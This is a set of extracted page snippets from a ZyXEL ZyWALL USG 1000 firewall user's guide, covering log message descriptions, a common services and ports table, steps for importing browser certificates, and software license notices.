Page 918: ...alid service license 4 Rating service is restarting 5 Can t connect to rating server 6 Query failed 7 Query timeout 8 Too many queries 9 Unknown reason s website host s s cache hit The web site s category exists in the device s local cache and access was blocked according to a content filter profile 1st s website host 2nd s website category s Not in trusted web list The web site is not a trusted h...

Page 919: ...licy with the specified index number d has been added to the end of the list Anti Spam policy d has been deleted The anti spam policy with the specified index number d has been removed Anti Spam policy d has been moved to d The anti spam policy with the specified index number first d was moved to the specified index number second d White List checking has been activated The anti spam white list ha...

Page 920: ...een added DNSBL domain s has been modified to s The specified DNSBL domain name first s has been changed to the second s DNSBL domain s has been deleted The specified DNSBL domain name s has been removed DNSBL domain s has been activated The specified DNSBL domain name s has been turned on DNSBL domain s has been deactivated The specified DNSBL domain name s has been turned off Match White List d ...

Page 921: ...he IP address given to the SSL user The s address object is invalid IP in SSL Policy s The listed address object first s is not an allowed IP for the listed SSL policy second s The s address object does not has assignable IP in SSL Policy s There are no more assignable IP addresses in the listed address object first s The address object is used by the listed SSL policy second s The s address objec...

Page 922: ...in SSL VPN policy s So s will not be injected to client side The IP pool is in the same subnet as the specified address object first s in the listed SSL VPN policy second s so the listed address third s will not be given to an SSL VPN client The s is same subnet with IP pool in SSL VPN policy s So s will not be injected to client side The specified address object first s is in the same subnet as t...

Page 923: ...ser is using HTTP or HTTPS s s from s has been logged out SSLVPN idle timeout The specified user was signed out by the device due to an idle timeout The first s is the type of user account The second s is the user s user name The third s is the name of the service the user is using HTTP or HTTPS Failed login attempt to SSLVPN from s login on a lockout address An SSL VPN login attempt from the list...

Page 924: ...ecause the user name does not exist User s has been denied from L2TP service Disallowed User A user with the specified user name s was denied access to the L2TP over IPSec service because the user name is not specified in the L2TP over IPSec configuration User s has been denied from L2TP service Incorrect Password A user with the specified user name s was denied access to the L2TP over IPSec servi...

Page 925: ...group name cannot create too many groups d 1st max group num s cannot find entry s 1st zysh group name 2st zysh entry name s cannot remove entry s 1st zysh group name 2st zysh entry name List OPS can t alloc entry s 1st zysh entry name can t retrieve entry s 1st zysh entry name can t get entry s 1st zysh entry name can t print entry s 1st zysh entry name s cannot retrieve entries from list 1st zys...

Page 926: ...zysh table name Unable to move entry d 1st zysh entry num s invalid index 1st zysh table name Unable to delete entry d 1st zysh entry num Unable to change entry d 1st zysh entry num s cannot retrieve entries from table 1st zysh table name s invalid old new index 1st zysh table name Unable to move entry d 1st zysh entry num s apply failed at initial stage 1st zysh table name s apply failed at main ...

Page 927: ...er first num was moved to the specified index number second num New ADP rule has been appended An ADP rule has been added to the end of the list ADP rule num has been inserted An ADP rule has been inserted num is the number of the new rule ADP rule num has been modified The ADP rule of the specified number has been changed ADP profile name has been deleted The ADP rule with the specified name has ...

Page 928: ... compressed file because there were too many compressed files at the same time 1st s The protocol of the packet 2nd s The filename of the related file s due to more than one layer compressed file s could not be decompressed The ZyWALL could not decompress a compressed file because it contained other compressed files 1st s The protocol of the packet 2nd s The filename of the related file s due to p...

Page 929: ... was too large AV signature update has failed An anti virus signatures update failed for unknown reasons Anti Virus signatures missing refer to your user documentation to recover the default database file When the ZyWALL started it could not find the anti virus signature file See the CLI reference guide for how to restore the default system database Update signature version has failed An attempt t...

Page 930: ... file pattern was deleted from the white or black list 1st s The file pattern 2nd s The white list or black list File pattern s has been added in s An anti virus file pattern was added to the white or black list 1st s The file pattern 2nd s The white list or black list s has been s An anti virus file pattern white list or black list was turned on or off 1st s The white list or black list 2nd s Act...

Page 931: ...using HTTP HTTPS FTP Telnet SSH or console s s from s has been logged out ZyWALL lease timeout The ZyWALL is signing the specified user out due to a lease timeout 1st s The type of user account 2nd s The user s user name 3rd s The name of the service the user is using HTTP HTTPS FTP Telnet SSH or console s s from s has been logged out ZyWALL idle timeout The ZyWALL is signing the specified user ou...

Page 932: ...Table 277 myZyXEL com Logs LOG MESSAGE DESCRIPTION Send registration message to MyZyXEL com server has failed The device was not able to send a registration message to MyZyXEL com Get server response has failed The device sent packets to the MyZyXEL com server but did not receive a response The root cause may be that the connection is abnormal Timeout for get server response zysh need to catch MyZ...

Page 933: ...ervice activation has failed Because of lack must fields The device received an incomplete response from the myZyXEL com server and it caused a parsing error for the device Service expiration check has failed s The service expiration day check failed this log will append an error message returned by the MyZyXEL com server s error message returned by myZyXEL com server Service expiration check has ...

Page 934: ...ate has stopped because the device couldn t resolve the myZyXEL com server s FQDN to an IP address through gethostbyname Verify server s certificate has failed Update stop The device could not process an HTTPS connection because it could not verify the myZyXEL com server s certificate The update has stopped Send download request to update server has failed The device s attempt to send a download m...

Page 935: ...nti Virus signature download has succeeded The device successfully downloaded an anti virus signature file Anti Virus signature update has succeeded The device successfully downloaded and applied an anti virus signature file Anti Virus signature download has failed The device still cannot download the anti virus signature after 3 retries System protect signature download has succeeded The device s...

Page 936: ...y check The device processes a service expiration day check immediately after it starts up After register Do expiration daily check immediately The device processes a service expiration day check immediately after device registration Time is up Do expiration daily check The processes a service expiration day check every 24 hrs Read MyZyXEL com storage has failed Read data from EEPROM has failed Op...

Page 937: ... get server response After the device sent packets to a server the device did not receive any response from the server The root cause may be a network delay issue Download file size is wrong The file size downloaded for AS is not identical with content length Parse HTTP header has failed Device can t parse the HTTP header in a response returned by a server Maybe some HTTP headers are missing Table...

Page 938: ...stom IDP signature failed The error sid and message are displayed Custom signature import error line line sid sid error_message An attempt to import a custom IDP signature failed The errored line number in the file the error sid and error message are displayed Custom signature replace error line line sid sid error_message Custom IDP signature replacing failed Error line number of file sid and mess...

Page 939: ...last signature file update failed IDP signature update failed Can not update synchronized file An attempt to update the IDP signatures failed Rebuilding of the IDP device HA synchronized file failed IDP signature update from version version to version version has succeeded An IDP signature update succeeded The previous and updated IDP signature versions are listed IDP system protect signature upda...

Page 940: ... update the IDP signatures failed due to an internal system error System internal error Create IDP traffic anomaly entry failed There was an internal system error Query signature version failed The device could not get the signature version from the new signature package it downloaded from the update server Can not get signature version The device could not get the signature version from the new s...

Page 941: ...name has been modified IDP profile has been modified name is profile name IDP signatures missing please refer to your user documentation to recover the default database file When the ZyWALL started it could not find the IDP signature file See the CLI reference guide for how to restore the default system database IDP signature size is over system limitation The IDP signature set is too large exceed...

Page 942: ... the listed protocol s traffic Default port s of protocol s has been added The listed default port first s has been added for the listed protocol second s Default port s of protocol s has been removed The listed default port first s has been deleted for the listed protocol second s Rule s s has been moved to index s An application patrol rule has been moved 1st s Protocol name 2nd s From rule inde...

Page 943: ...he tunnel name When negotiating Phase 1 and selecting matched proposal My IP Address could not be resolved ID Tunnel s Phase 1 ID mismatch s is the tunnel name When negotiating Phase 1 the peer ID did not match ID Tunnel s Phase 2 Local ID mismatch s is the tunnel name When negotiating Phase 2 and checking IPsec SAs or the ID is IPv6 ID ID Tunnel s Phase 2 Remote ID mismatch s is the tunnel name W...

Page 944: ...ch SA Tunnel s Phase 2 pfs unsupported d s is the tunnel name When negotiating Phase 2 this device does not support the PFS specified SA Tunnel s Phase 2 SA encapsulation mismatch s is the tunnel name When negotiating Phase 2 the SA encapsulation did not match SA Tunnel s Phase 2 SA protocol mismatch s is the tunnel name When negotiating Phase 2 the SA protocol did not match SA Tunnel s SA sequenc...

Page 945: ...mote name The device sent a request to enter Aggressive Mode Send SA KE ID CER T CR HASH SIG NON CE DEL VID ATTR N OTFY s This is a combined message for outgoing IKE packets Start Phase 2 Quick Mode Indicates the beginning of phase 2 using quick mode The cookie pair is 0x 08x 08x 0x 08x 08x Indicates the initiator responder cookie pair The IPSec tunnel s is already established s is the tunnel name...

Page 946: ...s 0x x 0x x s rekeyed successfully The variables represent the phase 1 name tunnel name old SPI new SPI and the xauth name optional The tunnel was rekeyed successfully Tunnel s s Phase 1 pre shared key mismatch The variables represent the phase 1 name and tunnel name When negotiating phase 1 the pre shared keys did not match Tunnel s s Recving IKE request The variables represent the phase 1 name a...

Page 947: ... SEQ 0x x Packet Anti Replay detected The variables represent the SPI and the sequence number The device received a packet again that it had already received VPN connection s was disabled s is the VPN connection name An administrator disabled the VPN connection VPN connection s was enabled s is the VPN connection name An administrator enabled the VPN connection Due to active connection allowed exc...

Page 948: ... disabled Asymmetrical Route has been turned off Table 283 Sessions Limit Logs LOG MESSAGE DESCRIPTION Maximum sessions per host d was exceeded d is maximum sessions per host Table 284 Policy Route Logs LOG MESSAGE DESCRIPTION Can t open bwm_entries Policy routing can t activate BWM feature Can t open link_down Policy routing can t detect link up down status Cannot get handle from UAM user aware P...

Page 949: ...rule number Policy route rule d was moved to d Rule is moved 1st d the original policy route rule number 2nd d the new policy route rule number Policy route rule d was deleted Rule is deleted d the policy route rule number Policy route rules were flushed Policy routing rules are cleared BWM has been activated The global setting for bandwidth management on the ZyWALL has been turned on BWM has been...

Page 950: ...an administrator assigns a certificate for SSH the device needs to convert it to a key used for SSH s is certificate name assigned by user TELNET port has been changed to port s An administrator changed the port number for TELNET s is port number assigned by user TELNET port has been changed to default port An administrator changed the port number for TELNET back to the default 23 FTP certificate ...

Page 951: ...rieved from it Set timezone to s An administrator changed the time zone s is time zone value Set timezone to default An administrator changed the time zone back to the default 0 Enable daylight saving An administrator turned on daylight saving Disable daylight saving An administrator turned off daylight saving DNS access control rules have been reached the maximum number An administrator tried to ...

Page 952: ...led Wizard adds DNS server s failed because DNS zone setting has conflictd Wizard apply DNS server failed because DNS zone conflicted s is the IP address of the DNS server Wizard adds DNS server s failed because Zone Forwarder numbers have reached the maximum number of 32 Wizard apply DNS server fail because the device already has the maximum number of DNS records configured s is IP address of the...

Page 953: ...t d is down When LINK is down d is the port number s is dead at s A daemon process is gone was killed by the operating system 1st s Daemon Name 2nd s date and time s process count is incorrect at s The count of the listed process is incorrect 1st s Daemon Name 2nd s date and time s becomes Zombie at s A process is present but not functioning 1st s Daemon Name 2nd s date and time When memory usage ...

Page 954: ...esponse from an unknown client In total received d arp response packets for the requested IP address The device received the specified total number of ARP response packets for the requested IP address Clear arp cache successfully The ARP cache was cleared successfully Client MAC address is not an Ethernet address A client MAC address is not an Ethernet address DHCP request received via interface s...

Page 955: ...lformed for DynDNS server 1st s is the profile name 2nd s is the FQDN of the profile Update the profile s has failed because the FQDN s is not under your control The owner of this FQDN is not the user 1st s is the profile name 2nd s is the FQDN of the profile Update the profile s has failed because the FQDN s was blocked for abuse The FQDN is blocked by DynDNS 1st s is the profile name 2nd s is th...

Page 956: ...ame Update the profile s has failed because Custom IP was empty The DDNS profile s IP select type is custom and a custom IP was not defined s is the profile name Update the profile s has failed because WAN interface was empty If the DDNS profile s IP select type is iface it needs a WAN iface s is the profile name The profile s has been paused because the VRRP status of WAN interface was standby Th...

Page 957: ...S profile cannot be updated because the fail of ping check for HA iface s is the profile name DDNS has been disabled by Device HA DDNS is disabled by Device HA because all VRRP groups are standby DDNS has been enabled by Device HA DDNS is enabled by Device HA because one of VRRP groups is active Disable DDNS has succeeded Disable DDNS Enable DDNS has succeeded Enable DDNS DDNS profile s has been r...

Page 958: ...n t get memory from OS Can t load s module The connectivity check process can t load module for check link status s the connectivity module currently only ICMP available Can t handle isalive function of s module The connectivity check process can t execute isalive function from module for check link status s the connectivity module currently only ICMP available Create socket error The connectivity...

Page 959: ...as been created s the name of VRRP group Device HA VRRP group s has been modified An VRRP group has been modified s the name of VRRP group Device HA VRRP group s has been deleted An VRRP group has been deleted s the name of VRRP group Device HA VRRP interface s for VRRP Group s has changed Configuration of an interface that belonged to a VRRP group has been changed 1st s VRRP interface name 2ed s ...

Page 960: ... s Synchronization failed because the Backup could not connect to the Master The object to be synchronized 2ed s The feature name for the object to be synchronized Backup firmware version can not be recognized Stop syncing from Master The firmware version on the Backup cannot be resolved to check if it is the same as on the Master A Backup device only synchronizes from the Master if the Master and...

Page 961: ...nized d the retry count Recovring to Backup original state for s has failed An update failed The device will try to recover the failed update feature to the original state before Device HA synchronizes the specified object Recovering to Backup original state for s has succeeded Recovery succeeded when an update for the specified object failed One of VRRP groups has became avtive Device HA Sync has...

Page 962: ...n interface s has been changed to Out Only RIP direction on interface s has been changed to Out Only s Interface Name RIP authentication mode has been changed to s RIP authentication mode has been changed to text or md5 RIP text authentication key has been changed RIP text authentication key has been changed RIP md5 authentication id and key have been changed RIP md5 authentication id and key have...

Page 963: ...d s RIP Version RIP receive version on interface s has been reset to current global version s RIP receive version on interface s has been reset to current global version s 1st s Interface Name 2nd s RIP RIP v2 broadcast on interface s has been disabled RIP v2 broadcast on interface s has been disabled s Interface Name OSPF on interface s has been stopped because Device HA binds this interface Devi...

Page 964: ...terface Name Table 290 NAT Logs LOG MESSAGE DESCRIPTION The NAT range is full The NAT mapping table is full s FTP ALG has succeeded The FTP Application Layer Gateway ALG has been turned on or off s Enable or Disable Extra signal port of FTP ALG has been modified Extra FTP ALG port has been changed Signal port of FTP ALG has been modified Default FTP ALG port has been changed s H 323 ALG has succee...

Page 965: ...cessfully The router created a certificate request with the specified name Generate certificate request s failed errno d The router was not able to create a certificate request with the specified name See Table 292 on page 967 for details about the error number Generate PKCS 12 certificate s successfully The router created a PKCS 12 format certificate with the specified name Generate PKCS 12 certi...

Page 966: ...request name Import PKCS 7 certificate s into Trusted Certificate successfully The device imported a PKCS 7 format certificate into Trusted Certificates s is the certificate request name Decode imported certificate s failed The device was not able to decode an imported certificate s is certificate the request name Export PKCS 12 certificate s from My Certificate successfully The device exported a ...

Page 967: ...icate and the search constraints 2 Key usage mismatch between the certificate and the search constraints 3 Certificate was not valid in the time interval 4 Not used 5 Certificate is not valid 6 Certificate signature was not verified correctly 7 Certificate was revoked by a CRL 8 Certificate was not added to the cache 9 Certificate decoding failed 10 Certificate was not found anywhere 11 Certificat...

Page 968: ...t and a user tried to use the disconnect aux command Interface s will reapply because Device HA become active status Device ha became active and is using a PPP base interface the PPP interface must reapply s is the interface name Interface s will reapply because Device HA is not running Device ha was deleted and free PPP base interface PPP interface must reapply s is the interface name Interface s...

Page 969: ...status s TxP kts u RxPkts u Colli u T xB s u RxB s u UpTime s Port statistics log This log will be sent to the VRPT server 1st s physical port name 2nd s physical port status 1st u physical port Tx packets 2nd u physical port Rx packets 3rd u physical port packets collisions 4th u physical port Tx Bytes s 5th u physical port Rx Bytes s 3rd s physical port up time name s status s TxP kts u RxPkts u...

Page 970: ...ection timed out due to a lack of response from the PPPOE server s PPP interface name Interface s create failed because has no member A bridge interface has no member s bridge interface name Interface cellular Application Error Code d n The listed error code d was generated due to an internal cellular interface error An error d occurred while negotiating with the device in s Please try to remove t...

Page 971: ... PIN code setting The listed cellular interface d does has the wrong PIN code configured Unable to query the signal quality from the device in s Please try to remove then insert the device The ZyWALL could not check the signal strength for the listed cellular interface d This could be due to an error or being out of range of the ISP s cellular station Interface cellular d cannot connect to the ser...

Page 972: ...ks up because of changing Port Group Enable DHCP client An administrator used port grouping to assign a port to a representative Interface and this representative interface is set to DHCP client and only has one member In this case the DHCP client will be enabled s interface name Interface s links down because of changing Port Group Disable DHCP client An administrator used port grouping to assign...

Page 973: ...s 1st s is CLI command 2nd s is error message when apply CLI command WARNING s s Apply configuration failed this log will be what CLI command is and what warning message is 1st s is CLI command 2nd s is warning message when apply CLI command ERROR s s Run script failed this log will be what wrong CLI command is and what error message is 1st s is CLI command 2nd s is error message when apply CLI co...

Page 974: ...stname and MAC address are listed Table 298 E mail Daily Report Logs LOG MESSAGE DESCRIPTION Email Daily Report has been activated The daily e mail report function has been turned on The ZyWALL will e mail a daily report about the selected items at the scheduled time if the required settings are configured correctly Email Daily Report has been deactivated The daily e mail report function has been ...

Page 975: ...address and MAC address are also shown along with the binding type s for static or d for dynamic Table 300 Auth Policy Logs LOG MESSAGE DESCRIPTION Auth Policy featuer is disabled The auth policy feature is not enabled Auth policy d is disabled The specified auth policy rule is not activated System integrity error The ZyWALL cannot get the auth policy rule and related operation index Get lock id h...

Page 976: ...S object Trusted process check fail in s A user s computer did not match the user defined trusted process check in the specified EPS object Forbidden process check fail in s A user s computer did not match the user defined forbidden process check in the specified EPS object Files information check fail in s A user s computer did not match the user defined file information check in the specified EP...

Page 977: ...ther information about port numbers If the Protocol is TCP UDP or TCP UDP this is the IP port number If the Protocol is USER this is the IP protocol number Description This is a brief explanation of the applications that use this service or the situations in which this service is used Table 302 Commonly Used Services NAME PROTOCOL PORT S DESCRIPTION AH IPSEC_TUNNEL User Defined 51 The IPSEC AH Aut...

Page 978: ... Internet Group Management Protocol is used when sending packets to a specific group of hosts IKE UDP 500 The Internet Key Exchange algorithm is used for key distribution and management IRC TCP UDP 6667 This is another popular Internet chat program MSN Messenger TCP 1863 Microsoft Networks messenger service uses this protocol NEW ICQ TCP 5190 An Internet chat program NEWS TCP 144 A protocol for ne...

Page 979: ...is the message exchange standard for the Internet SMTP enables you to move messages from one e mail server to another SNMP TCP UDP 161 Simple Network Management Program SNMP TRAPS TCP UDP 162 Traps for use with the SNMP RFC 1215 SQL NET TCP 1521 Structured Query Language is an interface to access data on many different types of database systems including mainframes midrange systems UNIX systems an...

Page 980: ... Transfer Protocol is an Internet file transfer protocol similar to FTP but uses the UDP User Datagram Protocol rather than TCP Transmission Control Protocol VDOLIVE TCP 7000 Another videoconferencing solution Table 302 Commonly Used Services continued NAME PROTOCOL PORT S DESCRIPTION ...

Page 981: ... message on Miscrosoft Windows based computers If the log shows that virus files are being detected but your Miscrosoft Windows based computer is not displaying an alert message use one of the following procedures to make sure your computer is set to display the messages Windows XP 1 Click Start Control Panel Administrative Tools Services Figure 576 Windows XP Opening the Services Window ...

Page 982: ... s Guide 982 2 Select the Messenger service and click Start Figure 577 Windows XP Starting the Messenger Service 3 Close the window when you are done Windows 2000 1 Click Start Settings Control Panel Administrative Tools Services Figure 578 Windows 2000 Opening the Services Window ...

Page 983: ...the window when you are done Windows 98 SE Me For Windows 98 SE Me you must open the WinPopup window in order to view real time alert messages Click Start Run and enter winpopup in the field provided and click OK The WinPopup window displays as shown Figure 580 Windows 98 SE WinPopup If you want to display the WinPopup window at startup follow the steps below for Windows 98 SE steps are similar fo...

Page 984: ...USG 1000 User s Guide 984 1 Right click on the program task bar and click Properties Figure 581 WIndows 98 SE Program Task Bar 2 Click the Start Menu Programs tab and click Advanced Figure 582 Windows 98 SE Task Bar Properties 3 Double click Programs and click StartUp ...

Page 985: ...yWALL USG 1000 User s Guide 985 4 Right click in the StartUp pane and click New Shortcut Figure 583 Windows 98 SE StartUp 5 A Create Shortcut window displays Enter winpopup in the Command line field and click Next Figure 584 Windows 98 SE Startup Create Shortcut ...

Page 986: ... accept the default and click Finish Figure 585 Windows 98 SE Startup Select a Title for the Program 7 A shortcut is created in the StartUp pane Restart the computer when prompted Figure 586 Windows 98 SE Startup Shortcut Note The WinPopup window displays after the computer finishes the startup process see Figure 580 on page 983 ...

Page 987: ...tes These can be used by web browsers on a LAN or WAN to verify that they are in fact connecting to the legitimate device and not one masquerading as it However because the certificates were not issued by one of the several organizations officially recognized by the most common web browsers you will need to import the ZyXEL created certificate into your web browser and flag that certificate as a t...

Page 988: ... the first time you browse to it you are presented with a certification error Figure 587 Internet Explorer 7 Certification Error 2 Click Continue to this website not recommended Figure 588 Internet Explorer 7 Certification Error 3 In the Address Bar click Certificate Error View certificates Figure 589 Internet Explorer 7 Certificate Error ...

Page 989: ...ZyWALL USG 1000 User s Guide 989 4 In the Certificate dialog box click Install Certificate Figure 590 Internet Explorer 7 Certificate 5 In the Certificate Import Wizard click Next Figure 591 Internet Explorer 7 Certificate Import Wizard ...

Page 990: ...matically select certificate store based on the type of certificate click Next again and then go to step 9 Figure 592 Internet Explorer 7 Certificate Import Wizard 7 Otherwise select Place all certificates in the following store and then click Browse Figure 593 Internet Explorer 7 Certificate Import Wizard ...

Page 991: ...t Certificate Store dialog box choose a location in which to save the certificate and then click OK Figure 594 Internet Explorer 7 Select Certificate Store 9 In the Completing the Certificate Import Wizard screen click Finish Figure 595 Internet Explorer 7 Certificate Import Wizard ...

Page 992: ...lly click OK when presented with the successful certificate installation message Figure 597 Internet Explorer 7 Certificate Import Wizard 12 The next time you start Internet Explorer and go to a ZyXEL Web Configurator page a sealed padlock icon appears in the address bar Click it to view the page s Website Identification information Figure 598 Internet Explorer 7 Website Identification ...

Page 993: ... one has been issued to you 1 Double click the public key certificate file Figure 599 Internet Explorer 7 Public Key Certificate File 2 In the security warning dialog box click Open Figure 600 Internet Explorer 7 Open File Security Warning 3 Refer to steps 4 12 in the Internet Explorer procedure beginning on page 987 to complete the installation process Removing a Certificate in Internet Explorer ...

Page 994: ...LL USG 1000 User s Guide 994 1 Open Internet Explorer and click Tools Internet Options Figure 601 Internet Explorer 7 Tools Menu 2 In the Internet Options dialog box click Content Certificates Figure 602 Internet Explorer 7 Internet Options ...

Page 995: ...icates Authorities tab select the certificate that you want to delete and then click Remove Figure 603 Internet Explorer 7 Certificates 4 In the Certificates confirmation click Yes Figure 604 Internet Explorer 7 Certificates 5 In the Root Certificate Store dialog box click Yes Figure 605 Internet Explorer 7 Root Certificate Store ...

Page 996: ... following example uses Mozilla Firefox 2 on Windows XP Professional however the screens can also apply to Firefox 2 on all platforms 1 If your device s Web Configurator is set to use SSL certification then the first time you browse to it you are presented with a certification error 2 Select Accept this certificate permanently and click OK Figure 606 Firefox 2 Website Certified by an Unknown Autho...

Page 997: ...the address bar which you can click to open the Page Info Security window to view the web page s security information Figure 607 Firefox 2 Page Info Installing a Stand Alone Certificate File in Firefox Rather than browsing to a ZyXEL Web Configurator and installing a public key certificate when prompted you can install a stand alone certificate file if one has been issued to you ...

Page 998: ...ng Certificates ZyWALL USG 1000 User s Guide 998 1 Open Firefox and click Tools Options Figure 608 Firefox 2 Tools Menu 2 In the Options dialog box click Advanced Encryption View Certificates Figure 609 Firefox 2 Options ...

Page 999: ...tes Import Figure 610 Firefox 2 Certificate Manager 4 Use the Select File dialog box to locate the certificate and then click Open Figure 611 Firefox 2 Select File 5 The next time you visit the web site click the padlock in the address bar to open the Page Info Security window to see the web page s security information ...

Page 1000: ...ing a Certificate in Firefox This section shows you how to remove a public key certificate in Firefox 2 1 Open Firefox and click Tools Options Figure 612 Firefox 2 Tools Menu 2 In the Options dialog box click Advanced Encryption View Certificates Figure 613 Firefox 2 Options ...

Page 1001: ...e Figure 614 Firefox 2 Certificate Manager 4 In the Delete Web Site Certificates dialog box click OK Figure 615 Firefox 2 Delete Web Site Certificates 5 The next time you go to the web site that issued the public key certificate you just removed a certification error appears Opera The following example uses Opera 9 on Windows XP Professional however the screens can apply to Opera 9 on all platform...

Page 1002: ...time you browse to it you are presented with a certification error 2 Click Install to accept the certificate Figure 616 Opera 9 Certificate signer not found 3 The next time you visit the web site click the padlock in the address bar to open the Security information window to view the web page s security details Figure 617 Opera 9 Security information ...

Page 1003: ...nd Alone Certificate File in Opera Rather than browsing to a ZyXEL Web Configurator and installing a public key certificate when prompted you can install a stand alone certificate file if one has been issued to you 1 Open Opera and click Tools Preferences Figure 618 Opera 9 Tools Menu ...

Page 1004: ...Appendix D Importing Certificates ZyWALL USG 1000 User s Guide 1004 2 In Preferences click Advanced Security Manage certificates Figure 619 Opera 9 Preferences ...

Page 1005: ...SG 1000 User s Guide 1005 3 In the Certificates Manager click Authorities Import Figure 620 Opera 9 Certificate manager 4 Use the Import certificate dialog box to locate the certificate and then click Open Figure 621 Opera 9 Import certificate ...

Page 1006: ...nstall authority certificate 6 Next click OK Figure 623 Opera 9 Install authority certificate 7 The next time you visit the web site click the padlock in the address bar to open the Security information window to view the web page s security details Removing a Certificate in Opera This section shows you how to remove a public key certificate in Opera 9 ...

Page 1007: ...Importing Certificates ZyWALL USG 1000 User s Guide 1007 1 Open Opera and click Tools Preferences Figure 624 Opera 9 Tools Menu 2 In Preferences Advanced Security Manage certificates Figure 625 Opera 9 Preferences ...

Page 1008: ...ificate you just removed a certification error appears Note There is no confirmation when you delete a certificate authority so be absolutely certain that you want to go through with it before clicking the button Konqueror The following example uses Konqueror 3 5 on openSUSE 10 3 however the screens apply to Konqueror 3 5 on all Linux KDE distributions 1 If your device s Web Configurator is set to...

Page 1009: ...nqueror 3 5 Server Authentication 3 Click Forever when prompted to accept the certificate Figure 628 Konqueror 3 5 Server Authentication 4 Click the padlock in the address bar to open the KDE SSL Information window and view the web page s security details Figure 629 Konqueror 3 5 KDE SSL Information ...

Page 1010: ...en prompted you can install a stand alone certificate file if one has been issued to you 1 Double click the public key certificate file Figure 630 Konqueror 3 5 Public Key Certificate File 2 In the Certificate Import Result Kleopatra dialog box click OK Figure 631 Konqueror 3 5 Certificate Import Result The public key certificate appears in the KDE certificate manager Kleopatra Figure 632 Konquero...

Page 1011: ...s security details Removing a Certificate in Konqueror This section shows you how to remove a public key certificate in Konqueror 3 5 1 Open Konqueror and click Settings Configure Konqueror Figure 633 Konqueror 3 5 Settings Menu 2 In the Configure dialog box select Crypto 3 On the Peer SSL Certificates tab select the certificate you want to delete and then click Remove Figure 634 Konqueror 3 5 Con...

Page 1012: ...e next time you go to the web site that issued the public key certificate you just removed a certification error appears Note There is no confirmation when you remove a certificate authority so be absolutely certain you want to go through with it before clicking the button ...

Page 1013: ...LISTED IN THE NOTICE OR APPENDIX BELOW ZYXEL MAY HAVE DISTRIBUTED TO YOU HARDWARE AND OR SOFTWARE OR MADE AVAILABLE FOR ELECTRONIC DOWNLOADS THESE FREE SOFTWARE PROGRAMS OF THRID PARTIES AND YOU ARE LICENSED TO FREELY COPY MODIFY AND REDISTIBUTE THAT SOFTWARE UNDER THE APPLICABLE LICENSE TERMS OF SUCH THIRD PARTY NONE OF THE STATEMENTS OR DOCUMENTATION FROM ZYXEL INCLUDING ANY RESTRICTIONS OR COND...

Page 1014: ...ntenance technical or other support for the resultant modified Software You may not copy reverse engineer decompile reverse compile translate adapt or disassemble the Software or any part thereof nor shall you attempt to create the source code from the object code for the Software Except as and only to the extent expressly permitted in this License you may not market co brand and private label or ...

Page 1015: ...EE OR IN AN UNINTERUPTED FASHION OR THAT ANY DEFECTS OR ERRORS IN THE SOFTWARE WILL BE CORRECTED OR THAT THE SOFTWARE IS COMPATIBLE WITH ANY PARTICULAR PLATFORM SOME JURISDICTIONS DO NOT ALLOW THE WAIVER OR EXCLUSION OF IMPLIED WARRANTIES SO THEY MAY NOT APPLY TO YOU IF THIS EXCLUSION IS HELD TO BE UNENFORCEABLE BY A COURT OF COMPETENT JURISDICTION THEN ALL EXPRESS AND IMPLIED WARRANTIES SHALL BE ...

Page 1016: ...ate this License Agreement for any reason including but not limited to if ZyXEL finds that you have violated any of the terms of this License Agreement Upon notification of termination you agree to destroy or return to ZyXEL all copies of the Software and Documentation and to certify in writing that all known copies including backup copies have been destroyed All provisions relating to confidentia...

Page 1017: ...ce Companies names and data used in examples herein are fictitious unless otherwise noted No part may be reproduced or transmitted in any form or by any means electronic or mechanical for any purpose except the express written permission of ZyXEL Communications Corporation This Product includes ppp software under the PPP License PPP License Copyright c 1993 The Australian National University All r...

Page 1018: ...cense Netkit Telnet License Copyright c 1989 Regents of the University of California All rights reserved Redistribution and use in source and binary forms with or without modification are permitted provided that the following conditions are met 1 Redistributions of source code must retain the above copyright notice this list of conditions and the following disclaimer 2 Redistributions in binary fo...

Page 1019: ...ies and that both the copyright notice and this permission notice appear in supporting documentation and that the name University of Delaware not be used in advertising or publicity pertaining to distribution of the software without specific written prior permission The University of Delaware makes no representations about the suitability this software for any purpose It is provided as is without ...

Page 1020: ... under the an X11 style License an X11 style license This is a Free Software License This license is compatible with The GNU General Public License Version 1 This license is compatible with The GNU General Public License Version 2 This is just like a Simple Permissive license but it requires that a copyright notice be maintained ________________________________________ Permission is hereby granted...

Page 1021: ...ource licenses In case of any license issues related to OpenSSL please contact openssl core openssl org OpenSSL License Copyright c 1998 2008 The OpenSSL Project All rights reserved Redistribution and use in source and binary forms with or without modification are permitted provided that the following conditions are met 1 Redistributions of source code must retain the above copyright notice this l...

Page 1022: ...derived from this software without prior written permission For written permission please contact openssl core openssl org 5 Products derived from this software may not be called OpenSSL nor may OpenSSL appear in their names without prior written permission of the OpenSSL Project 6 Redistributions of any form whatsoever must retain the following acknowledgment This product includes software develo...

Page 1023: ...F USE DATA OR PROFITS OR BUSINESS INTERRUPTION HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY WHETHER IN CONTRACT STRICT LIABILITY OR TORT INCLUDING NEGLIGENCE OR OTHERWISE ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE This product includes cryptographic software written by Eric Young eay cryptsoft com This product includes software written by ...

Page 1024: ...is Tim Hudson tjh cryptsoft com Copyright remains Eric Young s and as such any Copyright notices in the code are not to be removed If this package is used in a product Eric Young should be given attribution as the author of the parts of the library used This can be in the form of a textual message at program startup or in documentation online or textual provided with the package Redistribution and...

Page 1025: ...ctory application code you must include an acknowledgement This product includes software written by Tim Hudson tjh cryptsoft com THIS SOFTWARE IS PROVIDED BY ERIC YOUNG AS IS AND ANY EXPRESS OR IMPLIED WARRANTIES INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY ...

Page 1026: ...are under the a 3 clause BSD License a 3 clause BSD style license This is a Free Software License This license is compatible with The GNU General Public License Version 1 This license is compatible with The GNU General Public License Version 2 This is the BSD license without the obnoxious advertising clause It s also known as the modified BSD license Note that the University of California now pref...

